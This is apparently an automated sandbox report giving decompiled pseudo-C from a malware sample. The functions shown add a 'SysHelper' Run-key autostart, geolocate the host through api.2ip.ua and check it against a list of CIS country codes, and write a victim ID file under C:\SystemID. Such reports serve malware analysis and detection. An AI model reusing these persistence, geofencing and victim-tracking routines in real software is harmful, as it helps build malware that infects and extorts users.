DefWindowProcW.USER32(?,?,?,?), ref: 0041BBBA
_malloc.LIBCMT ref: 0041BBE4
GetComputerNameW.KERNEL32 ref: 0041BBF4
_free.LIBCMT ref: 0041BCD7

Part of subcall function 00411CD0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
Part of subcall function 00411CD0: _memset.LIBCMT ref: 00411D3B
Part of subcall function 00411CD0: RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
Part of subcall function 00411CD0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
Part of subcall function 00411CD0: lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
Part of subcall function 00411CD0: PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48

IsWindow.USER32(?), ref: 0041BF69
DestroyWindow.USER32(?), ref: 0041BF7B
DefWindowProcW.USER32(?,00008003,?,?), ref: 0041BFA8

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: Window$Proc$CloseComputerDestroyExistsFileMessageNameOpenPathPostQueryQuitValue_free_malloc_memsetlstrlen
String ID:
API String ID: 3873257347-0
Opcode ID: 87bc5245f617f35b1d818520b3ef80aa441e04352cb09ff08e16bfa3c0b549ad
Instruction ID: 866eb7db68ae170cd8e17be643faf7720e0ae735171854e0fa5cbc2bc792534d
Opcode Fuzzy Hash: 87bc5245f617f35b1d818520b3ef80aa441e04352cb09ff08e16bfa3c0b549ad
Instruction Fuzzy Hash: 85C19171508340AFDB20DF25DD45B9BBBE0FF85318F14492EF888863A1D7799885CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00423576 Relevance: 16.8, APIs: 11, Instructions: 258
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00423576(signed int __edx, signed int _a4, signed int _a8) {
				char _v8;
				char _v12;
				char _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int* _t81;
				signed int _t83;
				void* _t84;
				signed int _t87;
				signed int _t89;
				signed int _t92;
				void* _t94;
				signed int _t95;
				signed int _t98;
				signed int _t100;
				signed int _t102;
				signed int _t105;
				void* _t106;
				signed int _t108;
				void* _t109;
				signed int _t111;
				signed int _t117;
				signed int _t126;
				signed int _t132;
				signed int* _t135;
				signed int _t139;
				signed int _t141;
				void* _t143;
				void* _t155;
				signed int _t158;
				signed int _t167;
				signed int* _t171;
				signed int _t173;
				signed int _t177;
				signed int _t178;
				intOrPtr _t180;
				signed int _t182;
				void* _t184;
				void* _t186;
				signed int _t187;
				signed int _t188;

				_t167 = __edx;
				_t171 = _a4;
				_v12 = 0;
				_v16 = 0;
				_v8 = 0;
				_t195 = _t171;
				if(_t171 != 0) {
					E0042B420(_t171, 0xff, 0x24);
					_t177 = _a8;
					__eflags = _t177;
					if(__eflags == 0) {
						goto L1;
					} else {
						__eflags =  *(_t177 + 4);
						if(__eflags > 0) {
							L9:
							_t84 = 7;
							__eflags =  *(_t177 + 4) - _t84;
							if(__eflags < 0) {
								L12:
								E0042FB64(0, _t167, _t171, _t177, __eflags); // executed
								_t87 = E0042F803( &_v12);
								__eflags = _t87;
								if(_t87 != 0) {
									L45:
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									E004242FD(0, _t167);
									asm("int3");
									_push(_t177);
									_t180 = _v52;
									_t89 =  *(_t180 + 0xc);
									__eflags = _t89 & 0x00000083;
									if(__eflags != 0) {
										_push(0);
										_t139 = _a8;
										 *(_t180 + 0xc) = _t89 & 0xffffffef;
										_push(_t171);
										__eflags = _t139 - 1;
										if(_t139 != 1) {
											_t173 = _a4;
										} else {
											_t173 = _a4 + E004230C5(_t139, _t167, _t180, _t180);
											_t139 = 0;
										}
										E0042836B(_t167, _t180);
										_t92 =  *(_t180 + 0xc);
										__eflags = _t92;
										if(_t92 >= 0) {
											__eflags = _t92 & 0x00000001;
											if((_t92 & 0x00000001) != 0) {
												__eflags = _t92 & 0x00000008;
												if((_t92 & 0x00000008) != 0) {
													__eflags = _t92 & 0x00000400;
													if((_t92 & 0x00000400) == 0) {
														 *((intOrPtr*)(_t180 + 0x18)) = 0x200;
													}
												}
											}
										} else {
											 *(_t180 + 0xc) = _t92 & 0xfffffffc;
										}
										_push(_t139);
										_push(_t173);
										_push(E0042816B(_t180));
										_t94 = E0042818F(_t139, _t167, _t173, _t180, __eflags);
										__eflags = _t94 - 0xffffffff;
										_t78 = _t94 != 0xffffffff;
										__eflags = _t78;
										_t79 = (0 | _t78) - 1; // -1
										_t95 = _t79;
									} else {
										_t98 = E00425208(__eflags);
										 *_t98 = 0x16;
										_t95 = _t98 | 0xffffffff;
									}
									return _t95;
								} else {
									_t100 = E0042F82D( &_v16);
									__eflags = _t100;
									if(_t100 != 0) {
										goto L45;
									} else {
										_t102 = E0042F857( &_v8);
										__eflags = _t102;
										if(_t102 != 0) {
											goto L45;
										} else {
											_t11 = _t177 + 4; // 0x858d0050
											_t141 =  *_t11;
											_t155 =  *_t177;
											__eflags = _t141;
											if(__eflags < 0) {
												L23:
												_t83 = E0042F939(_t171, _t177);
												__eflags = _t83;
												if(_t83 == 0) {
													__eflags = _v12 - _t83;
													if(__eflags == 0) {
														L27:
														asm("cdq");
														_t182 = _t167;
														asm("cdq");
														_t143 =  *_t171 - _v8;
														asm("sbb esi, edx");
													} else {
														_push(_t171);
														_t126 = E0042FBB4(_t141, _t171, _t177, __eflags);
														__eflags = _t126;
														if(_t126 == 0) {
															goto L27;
														} else {
															asm("cdq");
															_t171[8] = 1;
															asm("cdq");
															_t143 =  *_t171 - _v16 + _v8;
															asm("sbb edx, esi");
															_a4 = _t167;
															_t182 = _t167;
														}
													}
													_t105 = E004305A0(_t143, _t182, 0x3c, 0);
													 *_t171 = _t105;
													__eflags = _t105;
													if(_t105 < 0) {
														_t143 = _t143 + 0xffffffc4;
														 *_t171 = _t105 + 0x3c;
														asm("adc esi, 0xffffffff");
													}
													_t106 = E004304F0(_t143, _t182, 0x3c, 0);
													_t144 = _t167;
													asm("cdq");
													_t184 = _t106 + _t171[1];
													asm("adc ebx, edx");
													_t108 = E004305A0(_t184, _t167, 0x3c, 0);
													_t171[1] = _t108;
													__eflags = _t108;
													if(_t108 < 0) {
														_t184 = _t184 + 0xffffffc4;
														_t171[1] = _t108 + 0x3c;
														asm("adc ebx, 0xffffffff");
													}
													_t109 = E004304F0(_t184, _t144, 0x3c, 0);
													_t145 = _t167;
													asm("cdq");
													_t186 = _t109 + _t171[2];
													asm("adc ebx, edx");
													_t111 = E004305A0(_t186, _t167, 0x18, 0);
													_t171[2] = _t111;
													__eflags = _t111;
													if(_t111 < 0) {
														_t186 = _t186 + 0xffffffe8;
														_t171[2] = _t111 + 0x18;
														asm("adc ebx, 0xffffffff");
													}
													_t158 = E004304F0(_t186, _t145, 0x18, 0);
													__eflags = _t167;
													if(__eflags < 0) {
														L43:
														_t171[3] = _t171[3] + _t158;
														asm("cdq");
														_t187 = 7;
														_t117 = _t171[3];
														_t171[6] = (_t171[6] + 7 + _t158) % _t187;
														__eflags = _t117;
														if(_t117 > 0) {
															goto L38;
														} else {
															_t171[4] = 0xb;
															_t171[3] = _t117 + 0x1f;
															_t55 = _t158 + 0x16d; // 0x16d
															_t171[7] = _t171[7] + _t55;
															_t171[5] = _t171[5] - 1;
														}
													} else {
														if(__eflags > 0) {
															L37:
															asm("cdq");
															_t188 = 7;
															_t39 =  &(_t171[3]);
															 *_t39 = _t171[3] + _t158;
															__eflags =  *_t39;
															_t171[6] = (_t171[6] + _t158) % _t188;
															L38:
															_t42 =  &(_t171[7]);
															 *_t42 = _t171[7] + _t158;
															__eflags =  *_t42;
														} else {
															__eflags = _t158;
															if(_t158 == 0) {
																__eflags = _t167;
																if(__eflags <= 0) {
																	if(__eflags < 0) {
																		goto L43;
																	} else {
																		__eflags = _t158;
																		if(_t158 < 0) {
																			goto L43;
																		}
																	}
																}
															} else {
																goto L37;
															}
														}
													}
													goto L39;
												}
											} else {
												if(__eflags > 0) {
													L18:
													asm("cdq");
													asm("sbb ebx, edx");
													_v24 = _t155 - _v8;
													_v20 = _t141;
													_t83 = E0042F939(_t171,  &_v24);
													__eflags = _t83;
													if(_t83 == 0) {
														__eflags = _v12 - _t83;
														if(__eflags == 0) {
															L39:
															_t83 = 0;
														} else {
															_push(_t171);
															_t132 = E0042FBB4(_t141, _t171, _t177, __eflags);
															__eflags = _t132;
															if(_t132 == 0) {
																goto L39;
															} else {
																asm("cdq");
																_v24 = _v24 - _v16;
																asm("sbb [ebp-0x10], edx");
																_t83 = E0042F939(_t171,  &_v24);
																__eflags = _t83;
																if(_t83 == 0) {
																	_t171[8] = 1;
																	goto L39;
																}
															}
														}
													}
												} else {
													__eflags = _t155 - 0x3f480;
													if(_t155 <= 0x3f480) {
														goto L23;
													} else {
														goto L18;
													}
												}
											}
											goto L3;
										}
									}
								}
							} else {
								if(__eflags > 0) {
									goto L8;
								} else {
									__eflags =  *_t177 - 0x93406fff;
									if(__eflags > 0) {
										goto L8;
									} else {
										goto L12;
									}
								}
							}
						} else {
							if(__eflags < 0) {
								L8:
								_t135 = E00425208(__eflags);
								_t178 = 0x16;
								 *_t135 = _t178;
								goto L2;
							} else {
								__eflags =  *_t177;
								if(__eflags >= 0) {
									goto L9;
								} else {
									goto L8;
								}
							}
						}
					}
				} else {
					L1:
					_t81 = E00425208(_t195);
					_t178 = 0x16;
					 *_t81 = _t178;
					E004242D2();
					L2:
					_t83 = _t178;
					L3:
					return _t83;
				}
			}

APIs

_memset.LIBCMT ref: 004235B1

Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208

__gmtime64_s.LIBCMT ref: 0042364A
__gmtime64_s.LIBCMT ref: 00423680
__gmtime64_s.LIBCMT ref: 0042369D
__allrem.LIBCMT ref: 004236F3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042370F
__allrem.LIBCMT ref: 00423726
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423744
__allrem.LIBCMT ref: 0042375B
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423779
__invoke_watson.LIBCMT ref: 004237EA

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
Instruction ID: ab95fd8d4aa8d0004faaa41ec126efad4d06c0b8c45c9850b5361983c80b405c
Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
Instruction Fuzzy Hash: 6E7108B1B00726BBD7149E6ADC41B5AB3B8AF40729F54823FF514D6381E77CEA408798

Uniqueness

Uniqueness Score: -1.00%

Function 0040CF10 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 228
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E0040CF10() {
				WCHAR* _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				WCHAR* _v24;
				char _v40;
				intOrPtr _v44;
				WCHAR* _v48;
				char _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				char _v88;
				intOrPtr _v92;
				WCHAR* _v96;
				char _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				char _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				long _v156;
				char _v10395;
				void _v10396;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t90;
				void* _t95;
				intOrPtr _t102;
				intOrPtr _t119;
				signed int _t122;
				void* _t128;
				WCHAR* _t129;
				WCHAR* _t131;
				intOrPtr* _t134;
				void* _t135;
				void* _t142;
				void* _t146;
				intOrPtr* _t147;
				void* _t149;
				signed int _t151;
				void* _t152;
				void* _t153;
				intOrPtr* _t157;
				void* _t158;
				void* _t159;
				intOrPtr _t160;
				void* _t161;

				_push(0xffffffff);
				_push(0x4ca850);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t160;
				E0042F7C0(0x2890);
				_push(_t128);
				_push(_t152);
				_v10396 = 0;
				E0042B420( &_v10395, 0, 0x27ff);
				_t161 = _t160 + 0xc;
				_t90 = InternetOpenW(L"Microsoft Internet Explorer", 0, 0, 0, 0); // executed
				_t149 = _t90;
				_v92 = 7;
				_push(0x1b);
				_v96 = 0;
				_v112 = 0;
				E00415C10(_t128,  &_v112, _t149, _t152, L"https://api.2ip.ua/geo.json");
				_v8 = 0;
				_t94 =  >=  ? _v112 :  &_v112;
				_t95 = InternetOpenUrlW(_t149,  >=  ? _v112 :  &_v112, 0, 0, 0, 0); // executed
				_t153 = _t95;
				if(_t153 != 0) {
					InternetReadFile(_t153,  &_v10396, 0x2800,  &_v156); // executed
					InternetCloseHandle(_t153);
					InternetCloseHandle(_t149);
					_push(0x10);
					_v44 = 0xf;
					_v48 = 0;
					_v64 = 0;
					E004156D0(_t128,  &_v64, _t149, "\"country_code\":\"");
					_v8 = 1;
					_v20 = 0xf;
					_v24 = 0;
					_v40 = 0;
					if(_v10396 != 0) {
						_t134 =  &_v10396;
						_t23 = _t134 + 1; // 0x1
						_t146 = _t23;
						do {
							_t102 =  *_t134;
							_t134 = _t134 + 1;
						} while (_t102 != 0);
						_t135 = _t134 - _t146;
					} else {
						_t135 = 0;
					}
					_push(_t135);
					E004156D0(_t128,  &_v40, _t149,  &_v10396);
					_v8 = 2;
					_t106 =  >=  ? _v64 :  &_v64;
					if(E00414300( &_v40,  >=  ? _v64 :  &_v64, 0, _v48) == 0xffffffff) {
						L30:
						_t129 = 0;
					} else {
						_t156 = E00413010( &_v40,  &_v136, _t107 + _v48, 0xa);
						if( &_v40 != _t114) {
							if(_v20 >= 0x10) {
								L00422587(_v40);
								_t161 = _t161 + 4;
							}
							_v20 = 0xf;
							_v24 = 0;
							_v40 = 0;
							E00413D40( &_v40, _t156);
						}
						if(_v116 >= 0x10) {
							L00422587(_v136);
							_t161 = _t161 + 4;
						}
						if(E00414300( &_v40, "\"", 0, 1) == 0xffffffff) {
							goto L30;
						} else {
							E00413010( &_v40,  &_v88, 0, _t116);
							_t131 = _v72;
							_t151 = 0;
							_v152 = "RU";
							_v148 = "BY";
							_v144 = "UA";
							_v140 = "AZ";
							_v136 = "AM";
							_v132 = "TJ";
							_v128 = "KZ";
							_v124 = "KG";
							_v120 = "UZ";
							_v116 = "SY";
							do {
								_t147 =  *((intOrPtr*)(_t159 + _t151 * 4 - 0x94));
								if( *_t147 != 0) {
									_t157 = _t147;
									_t61 = _t157 + 1; // 0x500005
									_t142 = _t61;
									do {
										_t119 =  *_t157;
										_t157 = _t157 + 1;
									} while (_t119 != 0);
									_t158 = _t157 - _t142;
								} else {
									_t158 = 0;
								}
								_t144 =  >=  ? _v88 :  &_v88;
								_t121 =  <  ? _t131 : _t158;
								_t122 = E0040B650( >=  ? _v88 :  &_v88, _t147,  <  ? _t131 : _t158);
								_t161 = _t161 + 4;
								if(_t122 != 0 || _t131 < _t158 || (_t122 & 0xffffff00 | _t131 != _t158) != 0) {
									goto L24;
								} else {
									_t129 = 1;
								}
								L26:
								if(_v68 >= 0x10) {
									L00422587(_v88);
									_t161 = _t161 + 4;
								}
								_v68 = 0xf;
								_v72 = 0;
								_v88 = 0;
								goto L31;
								L24:
								_t151 = _t151 + 1;
							} while (_t151 < 9);
							_t129 = 0;
							goto L26;
						}
					}
					L31:
					if(_v20 >= 0x10) {
						L00422587(_v40);
						_t161 = _t161 + 4;
					}
					_v20 = 0xf;
					_v24 = 0;
					_v40 = 0;
					if(_v44 >= 0x10) {
						L00422587(_v64);
						_t161 = _t161 + 4;
					}
					_v44 = 0xf;
					_v48 = 0;
					_v64 = 0;
				} else {
					_t129 = 0;
				}
				if(_v92 >= 8) {
					L00422587(_v112);
				}
				 *[fs:0x0] = _v16;
				return _t129;
			}

APIs

_memset.LIBCMT ref: 0040CF4A
InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
InternetReadFile.WININET(00000000,?,00002800,?), ref: 0040CFCD
InternetCloseHandle.WININET(00000000), ref: 0040CFDA
InternetCloseHandle.WININET(00000000), ref: 0040CFDD

Strings

https://api.2ip.ua/geo.json, xrefs: 0040CF79
Microsoft Internet Explorer, xrefs: 0040CF5A
"country_code":", xrefs: 0040CFE1

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleOpen$FileRead_memset
String ID: "country_code":"$Microsoft Internet Explorer$https://api.2ip.ua/geo.json
API String ID: 1485416377-2962370585
Opcode ID: 024b3a2441e03450481d723056a2cea3042cedec5767afe888cd0bf94bcd87ca
Instruction ID: 63dc5d72282b855868e1768d03255ed744c0e271f8772f8e66d922d9032ce3a5
Opcode Fuzzy Hash: 024b3a2441e03450481d723056a2cea3042cedec5767afe888cd0bf94bcd87ca
Instruction Fuzzy Hash: 0F91B470D00218EBDF10DF90DD55BEEBBB4AF05308F14416AE4057B2C1DBBA5A89CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040C740 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 254
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 88%

			E0040C740(char _a4, intOrPtr _a20, intOrPtr _a24) {
				struct _SECURITY_ATTRIBUTES* _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				struct _SECURITY_ATTRIBUTES* _v40;
				struct _SECURITY_ATTRIBUTES* _v56;
				char _v316;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t77;
				intOrPtr _t79;
				signed int _t86;
				void* _t92;
				void* _t95;
				void* _t96;
				signed int _t98;
				struct _SECURITY_ATTRIBUTES** _t101;
				DWORD* _t109;
				void* _t117;
				signed int _t121;
				intOrPtr _t123;
				intOrPtr* _t126;
				signed int _t127;
				signed int _t128;
				signed int _t138;
				intOrPtr _t141;
				signed int _t142;
				signed int _t143;
				intOrPtr _t144;
				signed int _t146;
				signed int _t147;
				signed int _t150;
				intOrPtr _t151;
				void* _t153;
				void* _t155;
				void* _t156;

				_push(0xffffffff);
				_push(0x4ca7b8);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t151;
				_v8 = 0;
				_t121 = 0;
				_t138 = 0;
				_v32 = 0;
				_t141 = 0;
				_v28 = 0;
				_v24 = 0;
				_v8 = 1;
				_t77 = E00420FDD(L"C:\\SystemID\\PersonalID.txt", "r"); // executed
				_t153 = _t151 - 0x130 + 8;
				_v20 = _t77;
				if(_t77 == 0) {
					L28:
					_t142 = _t121;
					if(_t121 == _t138) {
						L32:
						CreateDirectoryW(L"C:\\SystemID", 0); // executed
						_t79 = E00420FDD(L"C:\\SystemID\\PersonalID.txt", "w"); // executed
						_t153 = _t153 + 8;
						_v20 = _t79;
						if(_t79 != 0) {
							_t143 = _t121;
							__eflags = _t121 - _t138;
							if(_t121 == _t138) {
								L47:
								__eflags = _a24 - 8;
								_t144 = _v20;
								_t81 =  >=  ? _a4 :  &_a4;
								_push(_t144);
								_push( >=  ? _a4 :  &_a4);
								E004228FD(_t121, _t135, _t138, _t144, __eflags);
								_push(_t144);
								_push("\n");
								E004228FD(_t121, _t135, _t138, _t144, __eflags);
								_push(_t144); // executed
								_t79 = E00423A38(_t121, _t138, _t144, __eflags); // executed
								_t153 = _t153 + 0x14;
								__eflags = _t121;
								if(_t121 == 0) {
									L54:
									if(_a24 >= 8) {
										_t79 = L00422587(_a4);
									}
									 *[fs:0x0] = _v16;
									return _t79;
								}
								_t146 = _t121;
								__eflags = _t121 - _t138;
								if(_t121 == _t138) {
									L53:
									_t79 = L00422587(_t121);
									_t153 = _t153 + 4;
									goto L54;
								}
								do {
									__eflags =  *((intOrPtr*)(_t146 + 0x14)) - 8;
									if( *((intOrPtr*)(_t146 + 0x14)) >= 8) {
										L00422587( *_t146);
										_t153 = _t153 + 4;
									}
									 *((intOrPtr*)(_t146 + 0x14)) = 7;
									 *(_t146 + 0x10) = 0;
									 *_t146 = 0;
									_t146 = _t146 + 0x18;
									__eflags = _t146 - _t138;
								} while (_t146 != _t138);
								goto L53;
							}
							_t123 = _v20;
							do {
								__eflags =  *((intOrPtr*)(_t143 + 0x14)) - 8;
								if(__eflags < 0) {
									_t86 = _t143;
								} else {
									_t86 =  *_t143;
								}
								_push(_t123);
								_push(_t86);
								E004228FD(_t123, _t135, _t138, _t143, __eflags);
								_t143 = _t143 + 0x18;
								_t153 = _t153 + 8;
								__eflags = _t143 - _t138;
							} while (_t143 != _t138);
							_t121 = _v32;
							goto L47;
						}
						L33:
						if(_t121 == 0) {
							goto L54;
						}
						_t147 = _t121;
						if(_t121 == _t138) {
							goto L53;
						}
						do {
							if( *((intOrPtr*)(_t147 + 0x14)) >= 8) {
								L00422587( *_t147);
								_t153 = _t153 + 4;
							}
							 *((intOrPtr*)(_t147 + 0x14)) = 7;
							 *(_t147 + 0x10) = 0;
							 *_t147 = 0;
							_t147 = _t147 + 0x18;
						} while (_t147 != _t138);
						goto L53;
					}
					while(1) {
						_t91 =  >=  ? _a4 :  &_a4;
						_t79 = E00414C60(_t142,  >=  ? _a4 :  &_a4, 0, _a20);
						if(_t79 != 0xffffffff) {
							goto L33;
						}
						_t142 = _t142 + 0x18;
						if(_t142 != _t138) {
							continue;
						}
						goto L32;
					}
					goto L33;
				}
				_t92 = E00420546(_t77);
				_t155 = _t153 + 4;
				_t158 = _t92;
				if(_t92 != 0) {
					L27:
					_push(_v20);
					E00423A38(_t121, _t138, _t141, _t166);
					_t153 = _t155 + 4;
					goto L28;
				} else {
					do {
						_push(_v20);
						_push(0x7e);
						_push( &_v316);
						_t95 = E00421101(_t121, _t138, _t141, _t158);
						_t156 = _t155 + 0xc;
						if(_t95 == 0) {
							goto L26;
						}
						_v36 = 7;
						_v40 = 0;
						_v56 = 0;
						if(_v316 != 0) {
							_t126 =  &_v316;
							_t135 = _t126 + 2;
							do {
								_t98 =  *_t126;
								_t126 = _t126 + 2;
								__eflags = _t98;
							} while (_t98 != 0);
							_t127 = _t126 - _t135;
							__eflags = _t127;
							_t128 = _t127 >> 1;
							goto L9;
						} else {
							_t128 = 0;
							L9:
							_push(_t128);
							_t129 =  &_v56;
							E00415C10(_t121,  &_v56, _t138, _t141,  &_v316);
							_t101 =  &_v56;
							_v8 = 2;
							if(_t101 >= _t138 || _t121 > _t101) {
								__eflags = _t138 - _t141;
								if(_t138 == _t141) {
									E00414F70(_t121,  &_v32, _t138, _t129);
									_t138 = _v28;
									_t121 = _v32;
								}
								__eflags = _t138;
								if(_t138 != 0) {
									 *((intOrPtr*)(_t138 + 0x14)) = 7;
									 *(_t138 + 0x10) = 0;
									 *_t138 = 0;
									__eflags = _v36 - 8;
									if(_v36 >= 8) {
										 *_t138 = _v56;
										_v56 = 0;
									} else {
										_t109 =  &(_v40->nLength);
										__eflags = _t109;
										if(_t109 != 0) {
											E004205A0(_t138,  &_v56, _t109 + _t109);
											_t156 = _t156 + 0xc;
										}
									}
									 *(_t138 + 0x10) = _v40;
									 *((intOrPtr*)(_t138 + 0x14)) = _v36;
									__eflags = 0;
									_v36 = 7;
									_v40 = 0;
									_v56 = 0;
								}
							} else {
								_t132 = _t101 - _t121;
								_t135 = 0x2aaaaaab * (_t101 - _t121) >> 0x20 >> 2;
								_t150 = (0x2aaaaaab * (_t101 - _t121) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_t101 - _t121) >> 0x20 >> 2);
								if(_t138 == _v24) {
									E00414F70(_t121,  &_v32, _t138, _t132);
									_t138 = _v28;
									_t121 = _v32;
								}
								_t117 = _t121 + (_t150 + _t150 * 2) * 8;
								if(_t138 != 0) {
									E00413160(_t138, _t117);
								}
							}
							_t138 = _t138 + 0x18;
							_v8 = 1;
							_v28 = _t138;
							if(_v36 >= 8) {
								L00422587(_v56);
								_t156 = _t156 + 4;
							}
							_t141 = _v24;
						}
						L26:
						_t96 = E00420546(_v20);
						_t155 = _t156 + 4;
						_t166 = _t96;
					} while (_t96 == 0);
					goto L27;
				}
			}

APIs

Part of subcall function 00420FDD: __wfsopen.LIBCMT ref: 00420FE8

_fgetws.LIBCMT ref: 0040C7BC
_memmove.LIBCMT ref: 0040C89F
CreateDirectoryW.KERNEL32(C:\SystemID,00000000), ref: 0040C94B

Strings

C:\SystemID\PersonalID.txt, xrefs: 0040C77C, 0040C956
C:\SystemID, xrefs: 0040C946

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: CreateDirectory__wfsopen_fgetws_memmove
String ID: C:\SystemID$C:\SystemID\PersonalID.txt
API String ID: 2864494435-54166481
Opcode ID: 9dc020692cef374b1a029ecce09718c48db432c7c863de169bbf62cfcefd06b8
Instruction ID: 3a80d152ee3a33a632d987be3a831cd6f981e29f6d1810208bb328cacc5ceb60
Opcode Fuzzy Hash: 9dc020692cef374b1a029ecce09718c48db432c7c863de169bbf62cfcefd06b8
Instruction Fuzzy Hash: 449193B2E00219DBCF20DFA5D9857AFB7B5AF04304F54463BE805B3281E7799A44CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040F310 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 311
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E0040F310(void* __edi, void* __esi, char _a4, signed int _a20, intOrPtr _a24) {
				signed int _v8;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				signed int _v40;
				short _v56;
				intOrPtr _v60;
				signed int _v64;
				short _v80;
				intOrPtr _v84;
				signed int _v88;
				char _v104;
				void* __ebx;
				void* __ebp;
				_Unknown_base(*)()* _t147;
				void* _t169;
				void* _t173;
				void* _t177;
				void* _t195;
				void* _t203;
				struct HINSTANCE__* _t221;
				signed int _t222;
				void* _t233;
				void* _t235;
				signed int _t238;
				short _t260;
				char _t261;
				intOrPtr _t266;
				void* _t267;
				void* _t268;
				void* _t269;

				_push(0xffffffff);
				_push(E004CAA98);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t266;
				_t267 = _t266 - 0x58;
				_v8 = 0;
				_t221 = LoadLibraryW(L"Shell32.dll");
				if(_t221 != 0) {
					_t147 = GetProcAddress(_t221, "SHGetFolderPathW");
					_t259 = _t147;
					E00413A90(_t221,  &_v32, __edi, 0x400);
					_v8 = 1;
					_t254 = _v32;
					 *_t147(0, 0x28, 0, 0, _v32, __edi, __esi); // executed
					_push(_v20);
					_v36 = 7;
					_v40 = 0;
					_v56 = 0;
					E00418400( &_v56, _v32, _v28);
					_v8 = 2;
					_push(1);
					_v84 = 7;
					_v88 = 0;
					_v104 = 0;
					E00415C10(_t221,  &_v104, _t254, _t147, "\\");
					_v8 = 3;
					_push(1);
					_v60 = 7;
					_v64 = 0;
					_v80 = 0;
					E00415C10(_t221,  &_v80, _t254, _t147, "/");
					_v8 = 4;
					E0040F2B0( &_v56,  &_v80,  &_v104);
